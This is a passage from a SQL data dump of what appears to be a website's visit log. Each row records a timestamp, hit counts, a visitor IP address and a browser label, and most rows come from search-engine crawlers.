,0,'178.154.200.236','other'),(516844,1593024445,1,1,0,0,'157.55.39.180','other'),(516845,1593024554,1,1,0,0,'91.196.178.71','firefox'),(516846,1593024647,1,1,0,0,'66.249.70.72','chrome'),(516847,1593024943,8,8,0,0,'185.11.82.228','other'),(516848,1593025564,3,3,0,0,'66.249.70.72','chrome'),(516849,1593025949,1,1,0,0,'66.249.64.38','chrome'),(516850,1593026111,8,8,0,0,'77.120.98.235','other'),(516851,1593026151,1,1,0,0,'66.249.70.69','chrome'),(516852,1593026634,1,1,0,0,'213.180.203.101','other'),(516853,1593026693,1,1,0,0,'178.154.200.119','other'),(516854,1593026976,1,1,0,0,'17.58.99.7','other'),(516855,1593027143,8,8,0,0,'185.11.82.228','other'),(516856,1593027490,1,1,0,0,'157.55.39.180','other'),(516857,1593027738,1,1,0,0,'66.249.70.69','chrome'),(516858,1593028793,1,1,0,0,'8.29.198.25','other'),(516859,1593028851,1,1,0,0,'8.29.198.26','other'),(516860,1593029427,8,8,0,0,'185.11.82.228','other'),(516861,1593029582,1,1,0,0,'66.249.70.72','chrome'),(516862,1593029600,1,1,0,0,'66.249.70.69','chrome'),(516863,1593030692,1,1,0,0,'45.158.246.251','chrome'),(516864,1593030702,1,1,0,0,'45.133.170.47','chrome'),(516865,1593030898,1,1,0,0,'66.249.70.69','chrome'),(516866,1593031188,1,1,0,0,'17.58.99.7','other'),(516867,1593031326,1,1,0,0,'213.180.203.17','other'),(516868,1593031761,8,8,0,0,'185.11.82.228','other'),(516869,1593032708,4,4,0,0,'40.88.21.235','other'),(516870,1593033546,1,1,0,0,'66.249.70.72','chrome'),(516871,1593033957,1,1,0,0,'213.180.203.16','other'),(516872,1593034154,8,8,0,0,'185.11.82.228','other'),(516873,1593034457,2,2,0,0,'66.249.70.69','chrome'),(516874,1593034889,1,1,0,0,'66.249.64.38','chrome'),(516875,1593035646,1,1,0,0,'66.249.64.36','chrome'),(516876,1593035884,2,2,0,0,'66.249.70.70','chrome'),(516877,1593036009,2,2,0,0,'66.249.70.69','chrome'),(516878,1593036512,8,8,0,0,'185.11.82.228','other'),(516879,1593037569,1,0,1,0,'66.249.70.70',''),(516880,1593037692,1,1,0,0,'213.180.203.16','other'),(516881,1593037858,1,1,0,0,'66.249.70.69','chrome'),(516882,1593038451,1,1,0,0,'178.154.200.222','other'),(516883,1593038798,2,2,0,0,'66.249.64.33','chrome'),(516884,1593038877,8,8,0,0,'185.11.82.228','other'),(516885,1593039478,1,1,0,0,'66.249.70.70','chrome'),(516886,1593039578,1,1,0,0,'194.61.24.94','other'),(516887,1593039582,2,2,0,0,'66.249.70.72','chrome'),(516888,1593039628,1,1,0,0,'8.29.198.25','other'),(516889,1593039679,1,1,0,0,'8.29.198.26','other'),(516890,1593039767,1,1,0,0,'66.249.70.69','chrome'),(516891,1593040286,1,1,0,0,'91.196.178.25','chrome'),(516892,1593041179,1,1,0,0,'66.249.70.72','chrome'),(516893,1593041332,8,8,0,0,'185.11.82.228','other'),(516894,1593042282,2,2,0,0,'66.249.64.33','chrome'),(516895,1593042905,1,1,0,0,'62.205.134.182','other'),(516896,1593042907,1,1,0,0,'178.154.200.222','other'),(516897,1593043215,1,1,0,0,'66.249.70.72','chrome'),(516898,1593043220,2,2,0,0,'66.249.70.69','chrome'),(516899,1593043294,1,1,0,0,'5.9.98.178','other'),(516900,1593043756,8,8,0,0,'185.11.82.228','other'),(516901,1593044195,1,1,0,0,'5.9.98.178','other'),(516902,1593044477,1,1,0,0,'66.249.70.70','chrome'),(516903,1593045137,1,1,0,0,'5.9.98.178','other'),(516904,1593045944,1,1,0,0,'66.249.70.70','chrome'),(516905,1593046038,1,1,0,0,'5.9.98.178','other'),(516906,1593046239,8,8,0,0,'185.11.82.228','other'),(516907,1593046937,1,1,0,0,'213.180.203.16','other'),(516908,1593046942,1,1,0,0,'5.9.98.178','other'),(516909,1593047100,2,2,0,0,'66.249.70.69','chrome'),(516910,1593047260,1,1,0,0,'66.249.70.72','chrome'),(516911,1593047845,1,1,0,0,'5.9.98.178','other'),(516912,1593048689,8,8,0,0,'185.11.82.228','other'),(516913,1593048747,1,1,0,0,'5.9.98.178','other'),(516914,1593049516,2,2,0,0,'66.249.70.72','chrome'),(516915,1593049554,1,1,0,0,'66.249.64.36','chrome'),(516916,1593049649,1,1,0,0,'5.9.98.178','other'),(516917,1593050458,1,1,0,0,'8.29.198.26','other'),(516918,1593050510,1,1,0,0,'8.29.198.25','other'),(516919,1593050552,1,1,0,0,'5.9.98.178','other'),(516920,1593050585,2,2,0,0,'66.249.64.38','chrome'),(516921,1593050905,1,1,0,0,'213.180.203.90','other'),(516922,1593051341,1,1,0,0,'66.249.70.72','chrome'),(516923,1593052700,1,1,0,0,'17.58.99.7','other'),(516924,1593052750,1,1,0,0,'66.249.70.72','chrome'),(516925,1593052851,1,1,0,0,'66.249.70.69','chrome'),(516926,1593053106,8,8,0,0,'77.120.98.235','other'),(516927,1593053194,8,8,0,0,'185.11.82.228','other'),(516928,1593054571,1,1,0,0,'66.249.70.69','chrome'),(516929,1593054693,1,1,0,0,'213.180.203.41','other'),(516930,1593055034,1,1,0,0,'66.249.70.72','chrome'),(516931,1593055580,1,1,0,0,'66.249.70.70','chrome'),(516932,1593056064,1,1,0,0,'66.249.64.33','chrome'),(516933,1593056529,1,1,0,0,'66.249.70.72','chrome'),(516934,1593057139,1,1,0,0,'66.249.70.70','chrome'),(516935,1593057574,1,1,0,0,'66.249.70.69','chrome'),(516936,1593057799,1,1,0,0,'66.249.64.36','chrome'),(516937,1593058061,1,1,0,0,'66.249.70.72','chrome'),(516938,1593058107,1,1,0,0,'66.249.70.70','chrome'),(516939,1593058578,8,8,0,0,'185.11.82.228','other'),(516940,1593059130,7,7,0,0,'66.249.70.69','chrome'),(516941,1593059309,4,4,0,0,'66.249.70.70','chrome'),(516942,1593059486,1,1,0,0,'178.154.200.87','other'),(516943,1593060657,1,1,0,0,'66.249.70.72','chrome'),(516944,1593060684,1,1,0,0,'62.205.134.182','other'),(516945,1593060887,1,1,0,0,'66.249.64.38','chrome'),(516946,1593061033,2,2,0,0,'66.249.70.70','chrome'),(516947,1593061280,1,1,0,0,'8.29.198.25','other'),(516948,1593061336,1,1,0,0,'8.29.198.26','other'),(516949,1593061439,1,1,0,0,'178.154.200.176','other'),(516950,1593062072,1,1,0,0,'193.106.30.99','firefox'),(516951,1593062322,1,0,1,0,'66.249.70.72',''),(516952,1593062744,1,1,0,0,'66.249.70.69','chrome'),(516953,1593062830,1,1,0,0,'178.154.200.220','other'),(516954,1593063247,2,2,0,0,'66.249.70.72','chrome'),(516955,1593063605,1,1,0,0,'109.122.54.214','chrome'),(516956,1593063742,1,1,0,0,'178.154.200.220','other'),(516957,1593063753,2,2,0,0,'66.249.70.70','chrome'),(516958,1593063780,1,1,0,0,'66.249.70.69','chrome'),(516959,1593064294,8,8,0,0,'185.11.82.228','other'),(516960,1593064317,1,0,1,0,'66.249.64.38',''),(516961,1593064496,1,1,0,0,'66.249.64.33','chrome'),(516962,1593064859,1,1,0,0,'178.154.200.222','other'),(516963,1593065005,1,1,0,0,'66.249.70.70','chrome'),(516964,1593065378,1,1,0,0,'213.180.203.95','other'),(516965,1593065821,2,2,0,0,'66.249.70.72','chrome'),(516966,1593065835,1,1,0,0,'66.249.70.69','chrome'),(516967,1593066046,2,2,0,0,'66.249.70.70','chrome'),(516968,1593066786,3,3,0,0,'94.130.9.183','other'),(516969,1593068517,1,1,0,0,'66.249.70.72','chrome'),(516970,1593068894,1,1,0,0,'157.55.39.180','other'),(516971,1593069489,1,1,0,0,'178.154.200.222','other'),(516972,1593069560,1,1,0,0,'37.73.189.34','chrome'),(516973,1593069901,1,1,0,0,'77.111.244.26','chrome'),(516974,1593070409,8,8,0,0,'185.11.82.228','other'),(516975,1593070480,1,1,0,0,'66.249.70.70','chrome'),(516976,1593070562,1,1,0,0,'131.220.6.152','chrome'),(516977,1593070726,1,1,0,0,'37.52.115.92','chrome'),(516978,1593071847,2,2,0,0,'66.249.70.72','chrome'),(516979,1593071916,1,1,0,0,'66.249.70.69','chrome'),(516980,1593072050,1,1,0,0,'17.58.99.7','other'),(516981,1593072110,2,2,0,0,'8.29.198.26','other'),(516982,1593072265,1,1,0,0,'37.73.189.34','chrome'),(516983,1593073420,2,2,0,0,'66.249.70.72','chrome'),(516984,1593073889,1,1,0,0,'5.181.131.138','chrome'),(516985,1593074691,1,1,0,0,'178.154.200.196','other'),(516986,1593075285,1,1,0,0,'66.249.70.69','chrome'),(516987,1593075588,1,1,0,0,'66.249.64.33','chrome'),(516988,1593075728,1,1,0,0,'92.113.190.225','chrome'),(516989,1593076505,2,2,0,0,'88.155.70.33','chrome'),(516990,1593077069,8,8,0,0,'185.11.82.228','other'),(516991,1593077102,1,1,0,0,'3.236.88.148','chrome'),(516992,1593077518,3,3,0,0,'66.249.70.70','chrome'),(516993,1593078000,1,1,0,0,'91.196.178.79','chrome'),(516994,1593079375,2,2,0,0,'66.249.70.69','chrome'),(516995,1593079615,1,1,0,0,'95.132.159.232','chrome'),(516996,1593080315,2,2,0,0,'66.249.70.70','chrome'),(516997,1593081286,1,1,0,0,'91.196.178.171','chrome'),(516998,1593081512,1,1,0,0,'66.249.70.69','chrome'),(516999,1593081819,1,1,0,0,'66.249.70.72','chrome'),(517000,1593082097,1,1,0,0,'109.74.154.72','chrome'),(517001,1593082901,3,3,0,0,'66.249.70.70','chrome'),(517002,1593082904,2,2,0,0,'66.249.70.72','chrome'),(517003,1593082906,1,1,0,0,'66.249.70.69','chrome'),(517004,1593082940,2,2,0,0,'8.29.198.25','other'),(517005,1593083535,1,1,0,0,'66.249.64.36','chrome'),(517006,1593083968,8,8,0,0,'185.11.82.228','other'),(517007,1593084874,1,1,0,0,'66.249.70.72','chrome'),(517008,1593085130,2,2,0,0,'66.249.64.36','chrome'),(517009,1593085214,1,1,0,0,'5.181.131.105','chrome'),(517010,1593085576,1,1,0,0,'31.13.127.7','other'),(517011,1593085577,1,1,0,0,'31.13.127.120','other'),(517012,1593085578,1,1,0,0,'31.13.127.3','other'),(517014,1593087323,2,2,0,0,'66.249.70.69','chrome'),(517015,1593087461,2,2,0,0,'66.249.64.36','chrome'),(517016,1593087581,2,2,0,0,'66.249.70.70','chrome'),(517017,1593088072,1,1,0,0,'176.37.4.44','firefox'),(517018,1593088116,1,1,0,0,'66.249.70.72','chrome'),(517019,1593088176,1,1,0,0,'91.196.178.21','chrome'),(517020,1593088616,4,4,0,0,'66.249.70.70','chrome'),(517021,1593089763,2,2,0,0,'66.249.70.70','chrome'),(517022,1593090125,1,1,0,0,'66.249.73.166','chrome'),(517023,1593090345,2,2,0,0,'66.249.70.69','chrome'),(517024,1593090455,3,3,0,0,'66.249.70.72','chrome'),(517025,1593091113,1,1,0,0,'88.155.202.173','chrome'),(517026,1593091689,3,3,0,0,'66.249.70.70','chrome'),(517027,1593092166,2,2,0,0,'66.249.70.72','chrome'),(517028,1593092744,8,8,0,0,'185.11.82.228','other'),(517029,1593092892,1,1,0,0,'66.249.64.36','chrome'),(517030,1593093069,1,1,0,0,'66.249.70.72','chrome'),(517031,1593093331,2,2,0,0,'66.249.70.69','chrome'),(517032,1593093774,2,2,0,0,'8.29.198.25','other'),(517033,1593093906,1,1,0,0,'157.55.39.180','other'),(517034,1593093945,2,2,0,0,'213.180.203.65','other'),(517035,1593093982,2,2,0,0,'66.249.64.36','chrome'),(517036,1593094816,1,1,0,0,'66.249.70.72','chrome'),(517037,1593095186,1,1,0,0,'178.159.37.88','chrome'),(517038,1593095449,3,3,0,0,'66.249.70.69','chrome'),(517039,1593095894,1,1,0,0,'66.249.70.70','chrome'),(517040,1593096165,1,1,0,0,'66.249.70.72','chrome'),(517041,1593097082,4,4,0,0,'66.249.70.70','chrome'),(517042,1593097376,1,1,0,0,'66.249.64.38','chrome'),(517043,1593097464,1,1,0,0,'157.55.39.146','other'),(517044,1593098118,1,1,0,0,'66.249.70.72','chrome'),(517045,1593099001,1,1,0,0,'178.154.200.236','other'),(517046,1593099002,1,1,0,0,'178.154.200.196','other'),(517047,1593099402,1,1,0,0,'66.249.70.72','chrome'),(517048,1593099416,1,1,0,0,'66.249.70.70','chrome'),(517049,1593099430,2,2,0,0,'66.249.70.69','chrome'),(517050,1593099819,1,1,0,0,'89.19.48.123','chrome'),(517051,1593100654,1,1,0,0,'66.249.70.70','chrome'),(517052,1593101197,2,2,0,0,'66.249.70.69','chrome'),(517053,1593102142,2,2,0,0,'66.249.70.72','chrome'),(517054,1593102172,1,1,0,0,'66.249.70.70','chrome'),(517055,1593102370,1,1,0,0,'66.249.64.38','chrome'),(517056,1593102772,1,1,0,0,'91.196.178.93','chrome'),(517057,1593103567,1,1,0,0,'66.249.70.72','chrome'),(517058,1593104337,1,1,0,0,'193.58.104.249','chrome'),(517059,1593104484,2,2,0,0,'66.249.70.69','chrome'),(517060,1593104608,1,1,0,0,'66.249.70.70','chrome'),(517061,1593104609,1,1,0,0,'8.29.198.25','other'),(517062,1593104658,1,1,0,0,'8.29.198.27','other'),(517063,1593104907,8,8,0,0,'185.11.82.228','other'),(517064,1593105612,2,2,0,0,'66.249.70.72','chrome'),(517065,1593106653,2,2,0,0,'66.249.64.38','chrome'),(517066,1593107070,1,1,0,0,'17.58.99.7','other'),(517067,1593107818,1,1,0,0,'213.180.203.17','other'),(517068,1593107845,2,2,0,0,'66.249.70.72','chrome'),(517069,1593107946,1,1,0,0,'66.249.64.36','chrome'),(517070,1593108065,2,2,0,0,'66.249.70.69','chrome'),(517071,1593108383,1,1,0,0,'157.55.39.146','other'),(517072,1593109267,1,1,0,0,'66.249.64.36','chrome'),(517073,1593109529,3,3,0,0,'66.249.70.69','chrome'),(517074,1593109560,4,4,0,0,'66.249.70.70','chrome'),(517075,1593110051,1,1,0,0,'66.249.64.38','chrome'),(517076,1593111032,1,1,0,0,'213.180.203.16','other'),(517077,1593111231,1,1,0,0,'178.154.200.92','other'),(517078,1593111271,2,2,0,0,'66.249.70.69','chrome'),(517079,1593111289,3,3,0,0,'66.249.70.70','chrome'),(517080,1593111528,3,3,0,0,'66.249.70.72','chrome'),(517081,1593111862,1,1,0,0,'66.249.64.38','chrome'),(517082,1593112172,1,1,0,0,'94.153.48.8','chrome'),(517083,1593112720,2,2,0,0,'66.249.70.69','chrome'),(517084,1593112821,1,1,0,0,'66.249.64.33','chrome'),(517085,1593113064,2,2,0,0,'66.249.70.72','chrome'),(517086,1593113339,1,1,0,0,'66.249.64.38','chrome'),(517087,1593113629,2,2,0,0,'66.249.70.69','chrome'),(517088,1593113920,1,1,0,0,'66.249.64.36','chrome'),(517089,1593114083,1,1,0,0,'178.154.200.220','other'),(517090,1593114417,2,2,0,0,'66.249.64.38','chrome'),(517091,1593114880,2,2,0,0,'66.249.70.69','chrome'),(517092,1593114907,1,1,0,0,'213.180.203.70','other'),(517093,1593115050,4,4,0,0,'66.249.70.70','chrome'),(517094,1593115439,1,1,0,0,'8.29.198.25','other'),(517095,1593115489,1,1,0,0,'8.29.198.27','other'),(517096,1593116197,1,1,0,0,'157.55.39.180','other'),(517097,1593116563,3,3,0,0,'66.249.70.69','chrome'),(517098,1593116704,1,1,0,0,'193.106.30.99','firefox'),(517099,1593116724,1,1,0,0,'178.154.200.19','other'),(517100,1593116783,1,1,0,0,'66.249.70.72','chrome'),(517101,1593116815,4,4,0,0,'66.249.70.70','chrome'),(517102,1593117129,8,8,0,0,'185.11.82.228','other'),(517103,1593117418,1,1,0,0,'194.61.24.94','other'),(517104,1593117600,1,1,0,0,'66.249.64.36','chrome'),(517105,1593117929,1,1,0,0,'34.213.47.25','chrome'),(517106,1593118100,1,1,0,0,'66.249.70.72','chrome'),(517107,1593118109,2,2,0,0,'66.249.70.70','chrome'),(517108,1593118920,1,1,0,0,'66.249.64.36','chrome'),(517109,1593119223,1,1,0,0,'66.249.70.72','chrome'),(517110,1593119246,3,3,0,0,'66.249.70.70','chrome'),(517111,1593120513,1,1,0,0,'5.181.131.118','chrome'),(517112,1593120640,2,2,0,0,'66.249.70.69','chrome'),(517113,1593120659,1,1,0,0,'66.249.64.36','chrome'),(517114,1593120682,1,1,0,0,'66.249.70.70','chrome'),(517115,1593120696,2,2,0,0,'66.249.64.33','chrome'),(517116,1593120796,3,3,0,0,'66.249.70.72','chrome'),(517117,1593121021,1,1,0,0,'66.249.64.38','chrome'),(517118,1593122171,3,3,0,0,'213.180.203.16','other'),(517119,1593122204,2,2,0,0,'178.154.200.52','chrome'),(517120,1593122208,2,2,0,0,'213.180.203.14','chrome'),(517121,1593122210,2,2,0,0,'178.154.200.35','chrome'),(517123,1593122212,1,1,0,0,'178.154.200.148','chrome'),(517124,1593122213,1,1,0,0,'213.180.203.31','chrome'),(517125,1593122228,1,1,0,0,'213.180.203.169','chrome'),(517126,1593122230,1,1,0,0,'213.180.203.36','chrome'),(517127,1593122236,1,1,0,0,'178.154.200.85','chrome'),(517128,1593122315,2,2,0,0,'178.154.200.222','other'),(517129,1593122320,2,2,0,0,'66.249.70.72','chrome'),(517130,1593122323,1,1,0,0,'178.154.200.191','other'),(517131,1593122327,1,1,0,0,'178.154.200.216','other'),(517132,1593122330,1,1,0,0,'213.180.203.54','other'),(517133,1593122333,1,1,0,0,'178.154.200.207','other'),(517134,1593122336,1,1,0,0,'178.154.200.43','other'),(517135,1593122555,2,2,0,0,'46.211.26.20','chrome'),(517136,1593122631,8,8,0,0,'77.120.98.235','other'),(517137,1593122805,1,1,0,0,'66.249.64.36','chrome'),(517138,1593124034,2,2,0,0,'66.249.64.36','chrome'),(517139,1593124153,2,2,0,0,'66.249.70.69','chrome'),(517140,1593124461,2,2,0,0,'66.249.70.72','chrome'),(517141,1593124488,2,2,0,0,'66.249.64.38','chrome'),(517142,1593124685,1,1,0,0,'66.249.64.33','chrome'),(517143,1593124996,1,1,0,0,'213.180.203.16','other'),(517144,1593125896,3,3,0,0,'66.249.70.70','chrome'),(517145,1593126203,1,1,0,0,'157.55.39.180','other'),(517146,1593126264,1,1,0,0,'8.29.198.27','other'),(517147,1593126315,1,1,0,0,'8.29.198.26','other'),(517148,1593126373,2,2,0,0,'66.249.70.69','chrome'),(517149,1593126441,4,4,0,0,'66.249.70.72','chrome'),(517150,1593126540,1,1,0,0,'51.77.52.160','chrome'),(517151,1593126968,1,1,0,0,'178.154.200.222','other'),(517152,1593127001,1,1,0,0,'66.249.64.36','chrome'),(517153,1593127345,1,1,0,0,'66.249.70.72','chrome'),(517154,1593127822,5,5,0,0,'66.249.70.70','chrome'),(517155,1593128409,2,2,0,0,'66.249.70.72','chrome'),(517156,1593128643,1,1,0,0,'66.249.64.38','chrome'),(517157,1593128767,1,1,0,0,'66.249.70.69','chrome'),(517158,1593129159,8,8,0,0,'185.11.82.228','other'),(517159,1593129306,1,1,0,0,'62.205.134.182','other'),(517160,1593129399,2,2,0,0,'66.249.70.70','chrome'),(517161,1593130317,2,2,0,0,'66.249.70.72','chrome'),(517162,1593130546,3,3,0,0,'66.249.70.70','chrome'),(517163,1593130701,1,1,0,0,'157.55.39.146','other'),(517164,1593130822,1,1,0,0,'91.209.11.236','other'),(517165,1593131908,2,2,0,0,'66.249.70.72','chrome'),(517166,1593131959,2,2,0,0,'66.249.70.69','chrome'),(517167,1593131991,2,2,0,0,'66.249.70.70','chrome'),(517168,1593132372,1,1,0,0,'157.55.39.180','other'),(517169,1593132555,1,1,0,0,'66.249.64.38','chrome'),(517170,1593132769,1,1,0,0,'178.154.200.222','other'),(517171,1593132813,1,1,0,0,'137.226.113.27','other'),(517172,1593133371,2,2,0,0,'66.249.70.69','chrome'),(517173,1593133669,1,1,0,0,'66.249.70.72','chrome'),(517174,1593133719,2,2,0,0,'66.249.70.70','chrome'),(517175,1593134122,1,1,0,0,'213.180.203.16','other'),(517176,1593134806,1,1,0,0,'213.180.203.17','other'),(517177,1593135559,1,1,0,0,'66.249.70.70','chrome'),(517178,1593135889,1,1,0,0,'66.249.70.69','chrome'),(517179,1593136577,2,2,0,0,'66.249.70.70','chrome'),(517180,1593136834,1,1,0,0,'66.249.64.33','chrome'),(517181,1593137095,1,1,0,0,'8.29.198.26','other'),(517182,1593137150,1,1,0,0,'8.29.198.27','other'),(517183,1593137260,1,1,0,0,'66.249.70.72','chrome'),(517184,1593137334,2,2,0,0,'66.249.70.69','chrome'),(517185,1593137340,1,1,0,0,'157.55.39.180','other'),(517186,1593137475,1,1,0,0,'66.249.64.38','chrome'),(517187,1593138250,1,1,0,0,'157.55.39.180','other'),(517188,1593138402,3,3,0,0,'66.249.70.72','chrome'),(517189,1593138622,1,0,1,0,'66.249.70.69',''),(517190,1593138730,1,1,0,0,'178.154.200.222','other'),(517191,1593138773,1,1,0,0,'66.249.70.69','chrome'),(517192,1593138984,1,1,0,0,'66.249.70.70','chrome'),(517193,1593139631,1,1,0,0,'66.249.64.33','chrome'),(517194,1593140025,3,3,0,0,'66.249.70.72','chrome'),(517195,1593140057,2,2,0,0,'66.249.64.38','chrome'),(517196,1593140140,1,1,0,0,'178.154.200.220','other'),(517197,1593140260,2,2,0,0,'66.249.70.69','chrome'),(517198,1593140363,1,1,0,0,'178.154.200.222','other'),(517199,1593140600,1,1,0,0,'157.55.39.146','other'),(517200,1593140901,1,1,0,0,'213.180.203.95','other'),(517201,1593140993,1,1,0,0,'66.249.70.70','chrome'),(517202,1593141171,1,1,0,0,'157.55.39.180','other'),(517203,1593141427,8,8,0,0,'185.11.82.228','other'),(517204,1593142341,1,1,0,0,'178.154.200.222','other'),(517205,1593142924,1,1,0,0,'66.249.64.36','chrome'),(517206,1593143996,1,1,0,0,'213.180.203.122','other'),(517207,1593144071,1,1,0,0,'66.249.70.72','chrome'),(517208,1593145482,1,1,0,0,'157.55.39.180','other'),(517209,1593146044,1,1,0,0,'66.249.70.70','chrome'),(517210,1593146253,1,1,0,0,'66.249.64.36','chrome'),(517211,1593146274,1,1,0,0,'37.143.62.56','chrome'),(517212,1593146929,1,0,1,0,'66.249.70.72',''),(517213,1593147072,1,1,0,0,'62.205.134.182','other'),(517214,1593147390,1,1,0,0,'213.180.203.95','other'),(517215,1593147483,1,1,0,0,'66.249.70.69','chrome'),(517216,1593147860,1,1,0,0,'178.154.200.236','other'),(517217,1593147891,1,1,0,0,'66.249.64.36','chrome'),(517218,1593147922,2,2,0,0,'8.29.198.27','other'),(517219,1593148088,3,3,0,0,'66.249.70.70','chrome'),(517220,1593148320,1,1,0,0,'91.196.178.89','chrome'),(517221,1593149065,2,2,0,0,'66.249.70.72','chrome'),(517222,1593149354,2,2,0,0,'66.249.64.33','chrome'),(517223,1593149845,2,2,0,0,'66.249.70.70','chrome'),(517224,1593150220,1,1,0,0,'66.249.70.72','chrome'),(517225,1593150299,1,1,0,0,'66.249.64.33','chrome'),(517226,1593150716,1,1,0,0,'165.227.72.236','chrome'),(517227,1593151593,1,1,0,0,'66.249.70.69','chrome'),(517228,1593151651,1,1,0,0,'178.154.200.216','other'),(517229,1593151748,1,1,0,0,'77.111.244.7','chrome'),(517230,1593151848,2,2,0,0,'66.249.64.36','chrome'),(517231,1593151933,1,1,0,0,'91.196.177.15','chrome'),(517232,1593151985,1,1,0,0,'157.55.39.180','other'),(517233,1593152316,1,1,0,0,'66.249.70.70','chrome'),(517234,1593153023,1,1,0,0,'157.55.39.180','other'),(517235,1593153036,1,1,0,0,'66.249.70.69','chrome'),(517236,1593153472,1,1,0,0,'66.249.70.72','chrome'),(517237,1593153740,8,8,0,0,'185.11.82.228','other'),(517238,1593154052,3,3,0,0,'178.154.200.222','other'),(517239,1593155104,1,1,0,0,'66.249.70.70','chrome'),(517240,1593155247,1,1,0,0,'157.55.39.146','other'),(517241,1593155420,1,1,0,0,'157.55.39.180','other'),(517242,1593155513,1,1,0,0,'193.58.104.144','chrome'),(517243,1593155599,1,1,0,0,'66.249.64.38','chrome'),(517244,1593156567,1,1,0,0,'66.249.70.69','chrome'),(517245,1593156585,1,1,0,0,'66.249.64.33','chrome'),(517246,1593156812,1,1,0,0,'157.55.39.180','other'),(517247,1593156952,1,1,0,0,'131.220.6.152','chrome'),(517248,1593157066,3,3,0,0,'66.249.70.72','chrome'),(517249,1593157158,1,1,0,0,'66.249.70.70','chrome'),(517250,1593157530,1,1,0,0,'95.134.117.182','chrome'),(517251,1593158245,1,1,0,0,'66.249.64.36','chrome'),(517252,1593158492,1,1,0,0,'157.55.39.180','other'),(517253,1593158752,1,1,0,0,'8.29.198.26','other'),(517254,1593158807,1,1,0,0,'8.29.198.25','other'),(517255,1593159390,1,1,0,0,'91.196.178.84','firefox'),(517256,1593159657,2,2,0,0,'66.249.70.72','chrome'),(517257,1593159793,1,1,0,0,'213.180.203.17','other'),(517258,1593160534,1,1,0,0,'66.249.70.70','chrome'),(517259,1593160547,2,2,0,0,'188.143.169.29','other'),(517260,1593160689,1,1,0,0,'66.249.70.72','chrome'),(517261,1593161125,1,1,0,0,'66.249.64.36','chrome'),(517262,1593161369,1,1,0,0,'91.196.178.84','firefox'),(517263,1593162028,1,1,0,0,'66.249.70.69','chrome'),(517264,1593162625,1,1,0,0,'66.249.64.36','chrome'),(517265,1593162928,1,1,0,0,'89.19.48.144','chrome'),(517266,1593163124,3,3,0,0,'66.249.70.72','chrome'),(517267,1593163349,1,1,0,0,'66.249.70.70','chrome'),(517268,1593163955,1,1,0,0,'66.249.70.69','chrome'),(517269,1593164042,2,2,0,0,'66.249.70.72','chrome'),(517270,1593164208,1,1,0,0,'51.15.202.29','chrome'),(517271,1593164514,1,1,0,0,'66.249.64.36','chrome'),(517272,1593165028,2,2,0,0,'66.249.70.69','chrome'),(517273,1593165322,1,1,0,0,'46.174.125.28','chrome'),(517274,1593165529,1,1,0,0,'213.180.203.142','other'),(517275,1593166115,3,3,0,0,'66.249.70.69','chrome'),(517276,1593166322,1,1,0,0,'66.249.70.70','chrome'),(517277,1593166882,1,1,0,0,'3.236.125.12','chrome'),(517278,1593166922,1,1,0,0,'66.249.64.33','chrome'),(517279,1593167055,1,1,0,0,'66.249.70.72','chrome'),(517280,1593167078,1,1,0,0,'157.55.39.146','other'),(517281,1593167205,2,2,0,0,'213.180.203.16','other'),(517282,1593168232,8,8,0,0,'185.11.82.228','other'),(517283,1593168395,1,1,0,0,'88.155.39.148','chrome'),(517284,1593168421,1,1,0,0,'178.154.200.222','other'),(517285,1593168634,1,1,0,0,'92.63.111.27','other'),(517286,1593168669,2,2,0,0,'66.249.70.69','chrome'),(517287,1593169045,1,1,0,0,'66.249.64.38','chrome'),(517288,1593169395,1,1,0,0,'157.55.39.180','other'),(517289,1593169455,1,1,0,0,'178.154.200.222','other'),(517290,1593169586,1,1,0,0,'8.29.198.27','other'),(517291,1593169642,1,1,0,0,'8.29.198.25','other'),(517292,1593169644,1,1,0,0,'17.58.99.7','other'),(517293,1593169911,1,1,0,0,'109.74.154.72','chrome'),(517294,1593170228,1,1,0,0,'66.249.70.72','chrome'),(517295,1593170251,2,1,1,0,'66.249.70.69',''),(517296,1593170442,1,1,0,0,'213.180.203.16','other'),(517297,1593170689,1,1,0,0,'91.196.178.171','chrome'),(517298,1593170705,4,4,0,0,'66.249.70.69','chrome'),(517299,1593170799,1,1,0,0,'17.58.99.7','other'),(517300,1593170832,1,1,0,0,'178.154.200.220','other'),(517301,1593170890,1,1,0,0,'66.249.70.70','chrome'),(517302,1593171128,1,1,0,0,'91.196.177.15','chrome'),(517303,1593171529,1,1,0,0,'178.154.200.222','other'),(517304,1593171533,1,1,0,0,'213.180.203.17','other'),(517305,1593172046,1,1,0,0,'157.55.39.146','other'),(517306,1593172056,1,1,0,0,'178.154.200.220','other'),(517307,1593172250,1,1,0,0,'178.154.200.191','other'),(517308,1593172503,1,1,0,0,'66.249.70.72','chrome'),(517309,1593172613,1,1,0,0,'66.249.70.70','chrome'),(517310,1593173024,2,2,0,0,'178.154.200.222','other'),(517311,1593173982,3,3,0,0,'66.249.70.69','chrome'),(517312,1593174168,1,1,0,0,'178.154.200.196','other'),(517313,1593174544,1,1,0,0,'66.249.73.166','chrome'),(517314,1593174591,1,1,0,0,'178.154.200.222','other'),(517315,1593175254,2,2,0,0,'66.249.70.72','chrome'),(517316,1593175259,3,3,0,0,'66.249.70.69','chrome'),(517317,1593176933,2,2,0,0,'178.154.200.222','other'),(517318,1593177011,2,2,0,0,'66.249.70.72','chrome'),(517319,1593177052,2,2,0,0,'66.249.70.70','chrome'),(517320,1593177422,1,1,0,0,'213.180.203.16','other'),(517321,1593178141,1,1,0,0,'178.154.200.222','other'),(517322,1593178263,3,3,0,0,'66.249.70.70','chrome'),(517323,1593178423,2,2,0,0,'66.249.70.69','chrome'),(517324,1593178534,1,1,0,0,'66.249.64.33','chrome'),(517325,1593178657,1,1,0,0,'66.249.70.72','chrome'),(517326,1593178740,1,1,0,0,'66.249.64.36','chrome'),(517327,1593179542,1,1,0,0,'66.249.64.38','chrome'),(517328,1593180270,1,1,0,0,'157.55.39.180','other'),(517329,1593180416,2,2,0,0,'8.29.198.25','other'),(517330,1593180473,1,1,0,0,'66.249.70.70','chrome'),(517331,1593180943,2,2,0,0,'66.249.70.72','chrome'),(517332,1593181065,1,1,0,0,'66.249.64.38','chrome'),(517333,1593181574,1,1,0,0,'66.249.70.70','chrome'),(517334,1593182276,1,1,0,0,'66.249.64.38','chrome'),(517335,1593182413,2,2,0,0,'66.249.70.69','chrome'),(517336,1593182826,2,2,0,0,'66.249.64.36','chrome'),(517337,1593183117,1,1,0,0,'213.180.203.16','other'),(517338,1593183216,2,2,0,0,'66.249.64.38','chrome'),(517339,1593183844,1,1,0,0,'66.249.70.72','chrome'),(517340,1593184018,1,1,0,0,'66.249.70.70','chrome'),(517341,1593185184